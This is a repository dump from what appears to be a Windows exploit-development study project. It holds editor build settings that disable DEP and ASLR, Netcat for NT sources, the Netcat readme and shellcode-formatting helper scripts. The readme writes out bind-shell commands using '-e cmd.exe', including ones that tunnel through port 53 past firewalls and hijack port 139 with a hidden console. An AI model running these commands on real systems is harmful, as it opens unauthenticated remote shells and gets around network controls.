recent_files=C:\\Users\\Hideaki\\AppData\\Roaming\\geany\\filedefs\\filetypes.c;C:\\Users\\Hideaki\\AppData\\Roaming\\geany\\geany.conf;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\03_bufferoverflow\\Exploit_FileDump.py;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\02_bufferoverflow\\Exploit_CheckPass2.py;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\07_webserver\\Exploit_SimpleServer.py;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\07_webserver\\Test_SimpleServer.py;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\07_webserver\\SimpleServer.c;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\01_bufferoverflow\\CheckPass1.c;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\01_bufferoverflow\\Test_CheckPass1.py;C:\\Users\\Hideaki\\Desktop\\windows-exploit-development\\02_bufferoverflow\\Test_CheckPass2.py; 196 | recent_projects= 197 | current_page=0 198 | FILE_NAME_0=359;C;0;EUTF-8;1;1;0;C%3A%5CUsers%5CHideaki%5CAppData%5CRoaming%5Cgeany%5Cfiledefs%5Cfiletypes.c;0;4 199 | 200 | [build-menu] 201 | number_ft_menu_items=0 202 | number_non_ft_menu_items=0 203 | number_exec_menu_items=0 204 | NF_00_LB=メイク(_M) 205 | NF_00_CM=make 206 | NF_00_WD= 207 | NF_03_LB=リンク(DEP・ASLR無効) 208 | NF_03_CM=link %e.obj /link /nxcompat:no /dynamicbase:no wsock32.lib User32.lib 209 | NF_03_WD= 210 | -------------------------------------------------------------------------------- /11_tools/geany(appdata_roaming)/keybindings.conf: -------------------------------------------------------------------------------- 1 | [Bindings] 2 | popup_gototagdefinition= 3 | edit_transposeline=t 4 | edit_movelineup= 5 | edit_movelinedown= 6 | move_tableft=Page_Up 7 | move_tabright=Page_Down 8 | -------------------------------------------------------------------------------- /11_tools/geany(appdata_roaming)/templates/templates.README: -------------------------------------------------------------------------------- 1 | There are several template files in this directory. For these templates you can use wildcards. 2 | For more information read the documentation (in C:\Program Files (x86)\Geany\doc\index.html or visit http://www.geany.org/). -------------------------------------------------------------------------------- /11_tools/mona/mona-py-the-manual.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/mona/mona-py-the-manual.pdf -------------------------------------------------------------------------------- /11_tools/mona/mona_compare/mona_compare.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/mona/mona_compare/mona_compare.txt -------------------------------------------------------------------------------- /11_tools/mona/mona_compare/シェルコード比較.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/mona/mona_compare/シェルコード比較.JPG -------------------------------------------------------------------------------- /11_tools/mona/mona保存先設定/mona保存先設定_管理者権限が必要.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/mona/mona保存先設定/mona保存先設定_管理者権限が必要.txt -------------------------------------------------------------------------------- /11_tools/mona/mona保存先設定/mona設定ファイル.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/mona/mona保存先設定/mona設定ファイル.JPG -------------------------------------------------------------------------------- /11_tools/nc111nt/generic.h: -------------------------------------------------------------------------------- 1 | /* generic.h -- anything you don't #undef at the end remains in effect. 2 | The ONLY things that go in here are generic indicator flags; it's up 3 | to your programs to declare and call things based on those flags. 4 | 5 | You should only need to make changes via a minimal system-specific section 6 | at the end of this file. To build a new section, rip through this and 7 | check everything it mentions on your platform, and #undef that which needs 8 | it. If you generate a system-specific section you didn't find in here, 9 | please mail me a copy so I can update the "master". 10 | 11 | I realize I'm probably inventing another pseudo-standard here, but 12 | goddamnit, everybody ELSE has already, and I can't include all of their 13 | hairball schemes too. HAVE_xx conforms to the gnu/autoconf usage and 14 | seems to be the most common format. In fact, I dug a lot of these out 15 | of autoconf and tried to common them all together using "stupidh" to 16 | collect data from platforms. 17 | 18 | In disgust... _H* 940910, 941115. Pseudo-version: 1.1 */ 19 | 20 | #ifndef GENERIC_H /* only run through this once */ 21 | #define GENERIC_H 22 | 23 | /* =============================== */ 24 | /* System calls, lib routines, etc */ 25 | /* =============================== */ 26 | 27 | /* How does your system declare malloc, void or char? Usually void, but go 28 | ask the SunOS people why they had to be different... */ 29 | #define VOID_MALLOC 30 | 31 | /* notably from fwtk/firewall.h: posix locking? */ 32 | #define HAVE_FLOCK /* otherwise it's lockf() */ 33 | 34 | /* if you don't have setsid(), you might have setpgrp(). 35 | #define HAVE_SETSID 36 | 37 | /* random() is generally considered better than rand() */ 38 | /* xxx: rand48? */ 39 | #define HAVE_RANDOM 40 | 41 | /* if your machine doesn't have lstat(), it should have stat() [dos...] */ 42 | #define HAVE_LSTAT 43 | 44 | /* different kinds of term ioctls. How to recognize them, very roughly: 45 | sysv/POSIX_ME_HARDER: termio[s].h, struct termio[s], tty.c_*[] 46 | bsd/old stuff: sgtty.h, ioctl(TIOCSETP), sgttyb.sg_*, tchars.t_* 47 | #define HAVE_TERMIOS 48 | 49 | /* dbm vs ndbm */ 50 | #define HAVE_NDBM 51 | 52 | /* extended utmp/wtmp stuff. MOST machines still do NOT have this SV-ism */ 53 | #define UTMPX 54 | 55 | /* some systems have nice() which takes *relative* values... [resource.h] */ 56 | #define HAVE_SETPRIORITY 57 | 58 | /* a sysvism, I think, but ... */ 59 | #define HAVE_SYSINFO 60 | 61 | /* punted for now: setown / siocspgrp ... see firewall.h */ 62 | 63 | /* ============= */ 64 | /* Include files */ 65 | /* ============= */ 66 | 67 | /* Presence of these can be determined via a script that sniffs them 68 | out if you aren't sure. */ 69 | 70 | /* stdlib comes with most modern compilers, but ya never know */ 71 | #define HAVE_STDLIB_H 72 | 73 | /* not on a DOS box! */ 74 | #define HAVE_UNISTD_H 75 | 76 | /* stdarg is a weird one */ 77 | #define HAVE_STDARG_H 78 | 79 | /* dir.h or maybe ndir.h otherwise. */ 80 | #define HAVE_DIRENT_H 81 | 82 | /* string or strings */ 83 | #define HAVE_STRINGS_H 84 | 85 | /* if you don't have lastlog.h, what you want might be in login.h */ 86 | #define HAVE_LASTLOG_H 87 | 88 | /* predefines for _PATH_various */ 89 | #define HAVE_PATHS_H 90 | 91 | /* assorted others */ 92 | #define HAVE_PARAM_H 93 | #define HAVE_SYSMACROS_H /* in sys/! */ 94 | #define HAVE_TTYENT_H /* securetty et al */ 95 | 96 | /* ==================== */ 97 | 98 | /* Still maybe have to do something about the following, if it's even 99 | worth it. I just grepped a lot of these out of various code, without 100 | looking them up yet: 101 | 102 | #define HAVE_EINPROGRESS 103 | #define HAVE_F_SETOWN 104 | #define HAVE_SETENV ... now *there's* a hairy one; **environ is portable 105 | #define BIG_ENDIAN/little_endian ... *please* try to avoid this stupidity 106 | #define HAVE_GETUSERSHELL ... you could always pull it out of getpwent() 107 | #define HAVE_SETE[UG]ID ... lib or syscall, it varies on diff platforms 108 | #define HAVE_STRCHR ... should actually be handled by string/strings 109 | #define HAVE_PSTAT 110 | #define HAVE_ST_BLKSIZE ... a stat() thing? 111 | #define HAVE_IP_TOS 112 | #define HAVE_STRFTIME ... screw this, we should just INCLUDE one for lame 113 | old boxes that don't have it [sunos 3.x, early 4.x?] 114 | #define HAVE_VFPRINTF 115 | #define HAVE_SHADOW_PASSWD ... in its multitudinous schemes?? ... how 116 | about sumpin' like #define SHADOW_PASSWD_TYPE ... could get grody. 117 | #define SIG* ... what a swamp, punt for now; should all be in signal.h 118 | #define HAVE_STRCSPN ... see larry wall's comment in the fwtk regex code 119 | #define ULTRIX_AUTH ... bwahaha. 120 | #define HAVE_YP or NIS or whatever you wanna call it this week 121 | randomness about VARARGS?? 122 | 123 | There's also the issue about WHERE various .h files live, sys/ or otherwise. 124 | There's a BIG swamp lurking where network code of any sort lives. 125 | 126 | */ 127 | 128 | /* ======================== */ 129 | /* System-specific sections */ 130 | /* ======================== */ 131 | 132 | /* By turning OFF various bits of the above, you can customize for 133 | a given platform. /* 134 | 135 | /* DOS boxes, with MSC; you may need to adapt to a different compiler. */ 136 | #ifdef MSDOS 137 | #undef HAVE_FLOCK 138 | #undef HAVE_RANDOM 139 | #undef HAVE_LSTAT 140 | #undef HAVE_TERMIOS 141 | #undef UTMPX 142 | #undef HAVE_SYSINFO 143 | #undef HAVE_UNISTD_H 144 | #undef HAVE_DIRENT_H /* unless you have the k00l little wrapper from L5!! */ 145 | #undef HAVE_STRINGS_H 146 | #undef HAVE_LASTLOG_H 147 | #undef HAVE_PATHS_H 148 | #undef HAVE_PARAM_H 149 | #undef HAVE_SYSMACROS_H 150 | #undef HAVE_TTYENT_H 151 | #endif /* MSDOS */ 152 | 153 | /* buglix 4.x; dunno about 3.x on down. should be bsd4.2. */ 154 | #ifdef ULTRIX 155 | #undef UTMPX 156 | #undef HAVE_PATHS_H 157 | #undef HAVE_SYSMACROS_H 158 | #endif /* buglix */ 159 | 160 | /* some of this might still be broken on older sunoses */ 161 | #ifdef SUNOS 162 | #undef VOID_MALLOC 163 | #undef UTMPX 164 | #undef HAVE_PATHS_H 165 | #endif /* sunos */ 166 | 167 | /* "contact your vendor for a fix" */ 168 | #ifdef SOLARIS 169 | /* has UTMPX */ 170 | #undef HAVE_SETPRIORITY 171 | #undef HAVE_STRINGS_H /* this is genuinely the case, go figure */ 172 | #undef HAVE_PATHS_H 173 | #undef HAVE_TTYENT_H 174 | #endif /* SOLARIS */ 175 | 176 | /* whatever aix variant MIT had at the time */ 177 | #ifdef AIX 178 | #undef UTMPX 179 | #undef HAVE_LASTLOG_H 180 | #define HAVE_LOGIN_H /* "special", in the educational sense */ 181 | #endif /* aix */ 182 | 183 | /* linux, which is trying as desperately as the gnu folks can to be 184 | POSIXLY_CORRECT. I think I'm gonna hurl... */ 185 | #ifdef LINUX 186 | #undef UTMPX 187 | #undef HAVE_SYSINFO 188 | #undef HAVE_TTYENT_H 189 | #endif /* linux */ 190 | 191 | /* irix 5.x; may not be correct for earlier ones */ 192 | #ifdef IRIX 193 | /* wow, does irix really have everything?! */ 194 | #endif /* irix */ 195 | 196 | /* osf on alphas */ 197 | #ifdef OSF 198 | #undef UTMPX 199 | #endif /* osf */ 200 | 201 | /* they's some FUCKED UP paths in this one! */ 202 | #ifdef FREEBSD 203 | #undef UTMPX 204 | #undef HAVE_SYSINFO 205 | #undef HAVE_LASTLOG_H 206 | #undef HAVE_SYSMACROS_H 207 | #endif /* freebsd */ 208 | 209 | /* From the sidewinder site, of all places; may be unreliable */ 210 | #ifdef BSDI 211 | #undef UTMPX 212 | #undef HAVE_LASTLOG_H 213 | #undef HAVE_SYSMACROS_H 214 | #undef HAVE_TTYENT_H 215 | /* and their malloc.h was in sys/ ?! */ 216 | #endif /* bsdi */ 217 | 218 | /* netbsd/44lite, jives with amiga-netbsd from cactus */ 219 | #ifdef NETBSD 220 | #undef UTMPX 221 | #undef HAVE_SYSINFO 222 | #undef HAVE_LASTLOG_H 223 | #endif /* netbsd */ 224 | 225 | /* Make some "generic" assumptions if all else fails */ 226 | #ifdef GENERIC 227 | #undef HAVE_FLOCK 228 | #if defined(SYSV) && (SYSV < 4) /* TW leftover: old SV doesnt have symlinks */ 229 | #undef HAVE_LSTAT 230 | #endif /* old SYSV */ 231 | #undef HAVE_TERMIOS 232 | #undef UTMPX 233 | #undef HAVE_PATHS_H 234 | #endif /* generic */ 235 | 236 | /* ================ */ 237 | #endif /* GENERIC_H */ 238 | -------------------------------------------------------------------------------- /11_tools/nc111nt/getopt.h: -------------------------------------------------------------------------------- 1 | /* Declarations for getopt. 2 | Copyright (C) 1989, 90, 91, 92, 93, 94 Free Software Foundation, Inc. 3 | 4 | This file is part of the GNU C Library. Its master source is NOT part of 5 | the C library, however. The master source lives in /gd/gnu/lib. 6 | 7 | The GNU C Library is free software; you can redistribute it and/or 8 | modify it under the terms of the GNU Library General Public License as 9 | published by the Free Software Foundation; either version 2 of the 10 | License, or (at your option) any later version. 11 | 12 | The GNU C Library is distributed in the hope that it will be useful, 13 | but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | Library General Public License for more details. 16 | 17 | You should have received a copy of the GNU Library General Public 18 | License along with the GNU C Library; see the file COPYING.LIB. If 19 | not, write to the Free Software Foundation, Inc., 675 Mass Ave, 20 | Cambridge, MA 02139, USA. */ 21 | 22 | #ifndef _GETOPT_H 23 | #define _GETOPT_H 1 24 | 25 | #ifdef __cplusplus 26 | extern "C" { 27 | #endif 28 | 29 | /* For communication from `getopt' to the caller. 30 | When `getopt' finds an option that takes an argument, 31 | the argument value is returned here. 32 | Also, when `ordering' is RETURN_IN_ORDER, 33 | each non-option ARGV-element is returned here. */ 34 | 35 | extern char *optarg; 36 | 37 | /* Index in ARGV of the next element to be scanned. 38 | This is used for communication to and from the caller 39 | and for communication between successive calls to `getopt'. 40 | 41 | On entry to `getopt', zero means this is the first call; initialize. 42 | 43 | When `getopt' returns EOF, this is the index of the first of the 44 | non-option elements that the caller should itself scan. 45 | 46 | Otherwise, `optind' communicates from one call to the next 47 | how much of ARGV has been scanned so far. */ 48 | 49 | extern int optind; 50 | 51 | /* Callers store zero here to inhibit the error message `getopt' prints 52 | for unrecognized options. */ 53 | 54 | extern int opterr; 55 | 56 | /* Set to an option character which was unrecognized. */ 57 | 58 | extern int optopt; 59 | 60 | /* Describe the long-named options requested by the application. 61 | The LONG_OPTIONS argument to getopt_long or getopt_long_only is a vector 62 | of `struct option' terminated by an element containing a name which is 63 | zero. 64 | 65 | The field `has_arg' is: 66 | no_argument (or 0) if the option does not take an argument, 67 | required_argument (or 1) if the option requires an argument, 68 | optional_argument (or 2) if the option takes an optional argument. 69 | 70 | If the field `flag' is not NULL, it points to a variable that is set 71 | to the value given in the field `val' when the option is found, but 72 | left unchanged if the option is not found. 73 | 74 | To have a long-named option do something other than set an `int' to 75 | a compiled-in constant, such as set a value from `optarg', set the 76 | option's `flag' field to zero and its `val' field to a nonzero 77 | value (the equivalent single-letter option character, if there is 78 | one). For long options that have a zero `flag' field, `getopt' 79 | returns the contents of the `val' field. */ 80 | 81 | struct option 82 | { 83 | #if defined (__STDC__) && __STDC__ 84 | const char *name; 85 | #else 86 | char *name; 87 | #endif 88 | /* has_arg can't be an enum because some compilers complain about 89 | type mismatches in all the code that assumes it is an int. */ 90 | int has_arg; 91 | int *flag; 92 | int val; 93 | }; 94 | 95 | /* Names for the values of the `has_arg' field of `struct option'. */ 96 | 97 | #define no_argument 0 98 | #define required_argument 1 99 | #define optional_argument 2 100 | 101 | #if defined (__STDC__) && __STDC__ 102 | #ifdef __GNU_LIBRARY__ 103 | /* Many other libraries have conflicting prototypes for getopt, with 104 | differences in the consts, in stdlib.h. To avoid compilation 105 | errors, only prototype getopt for the GNU C library. */ 106 | extern int getopt (int argc, char *const *argv, const char *shortopts); 107 | #else /* not __GNU_LIBRARY__ */ 108 | extern int getopt (); 109 | #endif /* __GNU_LIBRARY__ */ 110 | extern int getopt_long (int argc, char *const *argv, const char *shortopts, 111 | const struct option *longopts, int *longind); 112 | extern int getopt_long_only (int argc, char *const *argv, 113 | const char *shortopts, 114 | const struct option *longopts, int *longind); 115 | 116 | /* Internal only. Users should not call this directly. */ 117 | extern int _getopt_internal (int argc, char *const *argv, 118 | const char *shortopts, 119 | const struct option *longopts, int *longind, 120 | int long_only); 121 | #else /* not __STDC__ */ 122 | extern int getopt (); 123 | extern int getopt_long (); 124 | extern int getopt_long_only (); 125 | 126 | extern int _getopt_internal (); 127 | #endif /* __STDC__ */ 128 | 129 | #ifdef __cplusplus 130 | } 131 | #endif 132 | 133 | #endif /* _GETOPT_H */ 134 | -------------------------------------------------------------------------------- /11_tools/nc111nt/makefile: -------------------------------------------------------------------------------- 1 | 2 | cc=cl 3 | link=link 4 | 5 | cflags=/nologo /ML /W3 /GX /O2 /D "NDEBUG" /D "WIN32" /D "_CONSOLE" /D "TELNET" /D "GAPING_SECURITY_HOLE" /YX /FD /c 6 | lflags=kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /machine:I386 /out:nc.exe 7 | 8 | all: nc.exe 9 | 10 | getopt.obj: getopt.c 11 | $(cc) $(cflags) getopt.c 12 | 13 | doexec.obj: doexec.c 14 | $(cc) $(cflags) doexec.c 15 | 16 | netcat.obj: netcat.c 17 | $(cc) $(cflags) netcat.c 18 | 19 | 20 | nc.exe: getopt.obj doexec.obj netcat.obj 21 | $(link) getopt.obj doexec.obj netcat.obj $(lflags) 22 | -------------------------------------------------------------------------------- /11_tools/nc111nt/nc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/nc111nt/nc.exe -------------------------------------------------------------------------------- /11_tools/nc111nt/readme.txt: -------------------------------------------------------------------------------- 1 | 2 | UPDATE 12/27/04 security fix in -e option for Windows 3 | 4 | Netcat 1.11 for NT - nc111nt.zip 5 | 6 | The original version of Netcat was written by *hobbit* 7 | The NT version was done by Weld Pond 8 | 9 | Netcat for NT is the tcp/ip "Swiss Army knife" that never made it into any 10 | of the resource kits. It has proved to be an extremely versatile tool on 11 | the unix platform. So why should NT always be unix's poor cousin when it 12 | comes to tcp/ip testing and exploration? I bet many NT admins out there 13 | keep a unix box around to use tools such as Netcat or to test their systems 14 | with the unix version of an NT vulnerability exploit. With Netcat for NT 15 | part of that feeling disempowerment is over. 16 | 17 | Included with this release is Hobbit's original description of the powers 18 | of Netcat. In this document I will briefly describe some of the things an 19 | NT admin might want to do and know about with Netcat on NT. For more 20 | detailed technical information please read hobbit.txt included in the 21 | nc11nt.zip archive. 22 | 23 | Basic Features 24 | 25 | * Outbound or inbound connections, TCP or UDP, to or from any ports 26 | * Full DNS forward/reverse checking, with appropriate warnings 27 | * Ability to use any local source port 28 | * Ability to use any locally-configured network source address 29 | * Built-in port-scanning capabilities, with randomizer 30 | * Can read command line arguments from standard input 31 | * Slow-send mode, one line every N seconds 32 | * Hex dump of transmitted and received data 33 | * Ability to let another program service established 34 | connections 35 | * Telnet-options responder 36 | 37 | New for NT 38 | 39 | * Ability to run in the background without a console window 40 | * Ability to restart as a single-threaded server to handle a new 41 | connection 42 | 43 | 44 | A simple example of using Netcat is to pull down a web page from a web 45 | server. With Netcat you get to see the full HTTP header so you can see 46 | which web server a particular site is running. 47 | 48 | Since NT has a rather anemic command processor, some of the things that are 49 | easy in unix may be a bit more clunky in NT. For the web page example first 50 | create a file get.txt that contains the following line and then a blank 51 | line: 52 | 53 | GET / HTTP/1.0 54 | 55 | To use Netcat to retrieve the home page of a web site use the command: 56 | nc -v www.website.com 80 < get.txt 57 | 58 | You will see Netcat make a connection to port 80, send the text contained 59 | in the file get.txt, and then output the web server's response to stdout. 60 | The -v is for verbose. It tells you a little info about the connection 61 | when it starts. 62 | 63 | It is a bit easier to just open the connection and then type at the console 64 | to do the same thing. 65 | nc -v www.website.com 80 66 | 67 | Then just type in GET / HTTP/1.0 and hit a couple of returns. You will 68 | see the same thing as above. 69 | 70 | A far more exciting thing to do is to get a quick shell going on a remote 71 | machine by using the -l or "listen" option and the -e or "execute" 72 | option. You run Netcat listening on particular port for a connection. 73 | When a connection is made, Netcat executes the program of your choice 74 | and connects the stdin and stdout of the program to the network connection. 75 | 76 | nc -l -p 23 -t -e cmd.exe 77 | 78 | will get Netcat listening on port 23 (telnet). When it gets connected to 79 | by a client it will spawn a shell (cmd.exe). The -t option tells Netcat 80 | to handle any telnet negotiation the client might expect. 81 | 82 | This will allow you to telnet to the machine you have Netcat listening on 83 | and get a cmd.exe shell when you connect. You could just as well use 84 | Netcat instead of telnet: 85 | 86 | nc xxx.xxx.xxx.xxx 23 87 | 88 | will get the job done. There is no authentication on the listening side 89 | so be a bit careful here. The shell is running with the permissions of the 90 | process that started Netcat so be very careful. If you were to use the 91 | AT program to schedule Netcat to run listening on a port with the 92 | -e cmd.exe option, when you connected you would get a shell with user 93 | NT AUTHORITY\SYSTEM. 94 | 95 | The beauty of Netcat really shines when you realize that you can get it 96 | listening on ANY port doing the same thing. Do a little exploring and 97 | see if the firewall you may be behind lets port 53 through. Run Netcat 98 | listening behind the firewall on port 53. 99 | 100 | nc -L -p 53 -e cmd.exe 101 | 102 | Then from outside the firewall connect to the listening machine: 103 | 104 | nc -v xxx.xxx.xxx.xx 53 105 | 106 | If you get a command prompt then you are executing commands on the 107 | listening machine. Use 'exit' at the command prompt for a clean 108 | disconnect. The -L (note the capital L) option will restart Netcat with 109 | the same command line when the connection is terminated. This way you can 110 | connect over and over to the same Netcat process. 111 | 112 | A new feature for the NT version is the -d or detach from console flag. 113 | This will let Netcat run without an ugly console window cluttering up the 114 | screen or showing up in the task list. 115 | 116 | You can even get Netcat to listen on the NETBIOS ports that are probably 117 | running on most NT machines. This way you can get a connection to a 118 | machine that may have port filtering enabled in the TCP/IP Security Network 119 | control panel. Unlike Unix, NT does not seem to have any security around 120 | which ports that user programs are allowed to bind to. This means any 121 | user can run a program that will bind to the NETBIOS ports. 122 | 123 | You will need to bind "in front of" some services that may already be 124 | listening on those ports. An example is the NETBIOS Session Service that 125 | is running on port 139 of NT machines that are sharing files. You need 126 | to bind to a specific source address (one of the IP addresses of the 127 | machine) to accomplish this. This gives Netcat priority over the NETBIOS 128 | service which is at a lower priority because it is bound to ANY IP address. 129 | This is done with the Netcat -s option: 130 | 131 | nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx 132 | 133 | Now you can connect to the machine on port 139 and Netcat will field 134 | the connection before NETBIOS does. You have effectively shut off 135 | file sharing on this machine by the way. You have done this with just 136 | user privileges to boot. 137 | 138 | PROBLEMS with Netcat 1.1 for NT 139 | 140 | There are a few known problems that will eventually be fixed. One is 141 | the -w or timeout option. This works for final net reads but not 142 | for connections. Another problem is using the -e option in UDP mode. 143 | You may find that some of the features work on Windows 95. Most 144 | of the listening features will not work on Windows 95 however. These will 145 | be fixed in a later release. 146 | 147 | Netcat is distributed with full source code so that people can build 148 | upon this work. If you add something useful or discover something 149 | interesting about NT TCP/IP let met know. 150 | 151 | Weld Pond , 2/2/98 152 | 153 | 154 | 155 | 156 | -------------------------------------------------------------------------------- /11_tools/python/assemble.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 -V 2 | # coding: Shift_JIS 3 | import sys 4 | import os 5 | import binascii 6 | 7 | path1 = os.path.abspath(os.path.dirname(__file__)) + "/assemble/temp.s" 8 | path2 = os.path.abspath(os.path.dirname(__file__)) + "/assemble/temp" 9 | 10 | sys.stdout = open(path1,"w") 11 | print("BITS 32") 12 | print("\n") 13 | print("_start:") 14 | 15 | sys.argv.pop(0) 16 | for line in sys.argv: 17 | print(" {0}".format(line)) 18 | 19 | sys.stdout.close() 20 | sys.stdout = sys.__stdout__ 21 | 22 | os.system("nasm " + path1); 23 | 24 | buf1 = [] 25 | buf2 = [] 26 | f = open(path2, "rb") 27 | for b in f.read(): 28 | s = hex(ord(b)).replace("0x","").zfill(2) 29 | buf1.append(s) 30 | buf2.append("\\x" + s) 31 | f.close() 32 | 33 | print("------------------------------------------") 34 | print(" ".join(buf1)) 35 | print("------------------------------------------") 36 | print("".join(buf2)) 37 | print("------------------------------------------") 38 | os.system("ndisasm -b32 " + path2); 39 | -------------------------------------------------------------------------------- /11_tools/python/assemble/temp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/python/assemble/temp -------------------------------------------------------------------------------- /11_tools/python/assemble/temp.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | 4 | _start: 5 | jmp esp 6 | -------------------------------------------------------------------------------- /11_tools/python/badchar.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/python/badchar.py -------------------------------------------------------------------------------- /11_tools/python/bin2str.bat: -------------------------------------------------------------------------------- 1 | echo off 2 | C:\Python34\python.exe C:\Users\Hideaki\Desktop\windows-exploit-development\11_tools\python\bin2str.py %1 3 | pause -------------------------------------------------------------------------------- /11_tools/python/bin2str.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 -V 2 | # coding: Shift_JIS 3 | import sys 4 | import os 5 | 6 | if len(sys.argv) == 0: 7 | print("binary file not found") 8 | exit 9 | 10 | 11 | buf1 = [] 12 | buf2 = [] 13 | buf3 = [] 14 | f = open(sys.argv[1], "rb") 15 | for b in f.read(): 16 | s = hex(ord(b)).replace("0x","").zfill(2) 17 | buf1.append(s) 18 | buf2.append("\\x" + s) 19 | buf3.append(b) 20 | f.close() 21 | 22 | print("size = {0}".format(len(buf1))) 23 | print("---------------------------------------------------------") 24 | print(" ".join(buf1)) 25 | print("---------------------------------------------------------") 26 | print("".join(buf2)) 27 | print("---------------------------------------------------------") 28 | l = "" 29 | for i in range(0, len(buf2)): 30 | l += buf2[i] 31 | if i > 0 and (i+1) % 16 == 0: 32 | print("shellcode += \"{0}\"".format(l)) 33 | l = "" 34 | if l != "": 35 | print("shellcode += \"{0}\"".format(l)) 36 | print("---------------------------------------------------------") 37 | 38 | #os.system("ndisasm -b32 " + sys.argv[1]); 39 | print("".join(buf3)) 40 | print("---------------------------------------------------------") 41 | -------------------------------------------------------------------------------- /11_tools/python/disassemble.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 -V 2 | # coding: Shift_JIS 3 | import sys 4 | import os 5 | import binascii 6 | 7 | os.system("ndisasm -b32 " + sys.argv[1]) 8 | -------------------------------------------------------------------------------- /11_tools/python/python_コマンドプロンプト.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/python/python_コマンドプロンプト.JPG -------------------------------------------------------------------------------- /11_tools/python/pythonパイプ.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/python/pythonパイプ.png -------------------------------------------------------------------------------- /11_tools/python/str2sjis.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/python/str2sjis.py -------------------------------------------------------------------------------- /11_tools/stracent-x86/info.txt: -------------------------------------------------------------------------------- 1 | StraceNT: 2 | ========= 3 | StraceNT is a system call tracer and it can trace all the calls a program makes 4 | to the functions imported from other DLLs. It is developed by Pankaj Garg for 5 | IntellectualHeaven (http://www.intellectualheaven.com) 6 | 7 | 8 | Updates: 9 | ======== 10 | Please check http://www.intellectualheaven.com to make sure that you have 11 | the latest version of StraceNT 12 | 13 | 14 | Installation: 15 | ============= 16 | For Windows 2000, XP and 2003: 17 | 1. Extract stracent.exe and straceui.exe to a directory. 18 | 2. Extract sample filter file stFilter.txt to the same directory. 19 | 20 | 21 | Features: 22 | ========= 23 | - Uses IAT patching which is a very efficient way to trace functions. 24 | - Provides excellent include/exclude support to give finer control over 25 | tracing. 26 | - Trace functions calls made to DLLs loaded dynamically using LoadLibrary. 27 | - Allows user to specify a different return value from a function. 28 | - Comes in both Graphical UI and command line version. 29 | - 100% free of cost. 30 | 31 | 32 | Known Limitation: 33 | ================= 34 | - Does not trace child processes created by the traced process. 35 | - Does not trace functions which are called by using GetProcAddress method. 36 | 37 | 38 | Version: 39 | ======== 40 | v0.8.1 (Beta2) (2005/03/01) 41 | - Added tracing of DLLs which are loaded dynamically using LoadLibrary 42 | - Added option for returning a different value from a function 43 | - Support is added for tracing functions exported by Ordinal 44 | - Modified inclusion/exclusion to provide much better control 45 | - Fixed few crashing bugs 46 | - Made a GUI version of StraceNT also 47 | 48 | v0.6.2 (Beta1) (2004/09/22) 49 | Current version of StraceNT is 0.6 which is also declared Beta1. This means 50 | that even though the program is throughly tested, there may be some unearthed 51 | bugs. If you encounter a bug or have a feature request, please drop a mail to 52 | x_pankaj_x@intellectualheaven.com 53 | 54 | 55 | Supported platforms: 56 | ==================== 57 | Windows 2000 58 | Windows XP (32-bit) 59 | Windows 2003 (32-bit) 60 | Windows XP (64-bit) - For tracing 32bit process *only* running inside wow64 61 | Windows 2003 (64-bit) - For tracing 32bit process *only* running inside wow64 62 | 63 | 64 | Warning: 65 | ======== 66 | On windows 2000, it uses windows debug support so if you attach StraceNT 67 | to a process, the process will die if you kill StraceNT. 68 | 69 | 70 | Usage: 71 | ====== 72 | Run stracent.exe from command line without any parameters. StraceNT will show 73 | its usage details. Alternatively, run straceui.exe which is a win32 GUI based 74 | version of StraceNT. To filter any particular DLLs or Function, use 75 | stFilter.txt as a sample and modify it to your needs. 76 | 77 | 78 | Questions: 79 | ========== 80 | For questions or suggestions, contact pankaj@intellectualheaven.com 81 | 82 | 83 | -- 84 | Regards, 85 | Pankaj Garg 86 | www.intellectualheaven.com 87 | -------------------------------------------------------------------------------- /11_tools/stracent-x86/stFilter.txt: -------------------------------------------------------------------------------- 1 | #++ 2 | # 3 | # Sample Trace filter file for StraceNT 4 | # Copyright (c) Pankaj Garg. All rights reserved 5 | # 6 | # 7 | # Usage Notes: 8 | # 9 | # You can specify INCLUDES and EXCLUDES in this filter file. You 10 | # can include/exclude a 